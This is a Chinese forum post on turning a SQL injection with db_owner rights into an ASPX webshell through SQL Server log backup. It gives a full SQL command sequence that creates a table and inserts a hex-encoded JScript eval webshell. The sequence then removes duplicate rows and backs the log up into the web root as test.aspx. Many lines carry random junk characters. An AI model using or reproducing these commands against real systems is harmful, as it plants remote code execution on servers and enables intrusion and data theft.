最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
) J- a" i; Y' |但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
# V* S' }# J" E0 J1 Y经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
6 q( ^$ F, x! ?: m" F经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
' g0 U, b; I$ t& [* J9 _! x$ e. i6 }" h5 s m3 L/ i6 T
--------------------------------------------------------------
, W, d/ Y. R" q7 B8 g今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错," @: E+ f# {. ?4 q5 ~
自己修改备份语句如下:
* u) A( r$ U$ {" d3 I# U& q. B# G( A. \Drop table cmd;--+ F8 ?! S4 L! I5 T3 W5 k6 \' V
alter database db_test set RECOVERY FULL;--" A, L4 O7 q5 p7 ^+ h8 l
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
0 j+ b; x. B) Q' Q! ^* rbackup log db_test to disk = 'c:\bak' with init;--
! V0 Q9 Q; E2 i0 ^! n4 D1 e, linsert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
8 s1 J ?) \4 I1 v6 V2 y" Y" @' Hdelete from cmd where id>1;--删除id>1的数据
: i$ |4 u2 }; O( G6 fbackup log db_test to disk = 'e:\webroot\test.aspx';--
7 N) x0 Q9 q* C2 o& MDrop table cmd;--: g D1 B1 s, B# F! f, }) U$ T
希望对大家有用。 |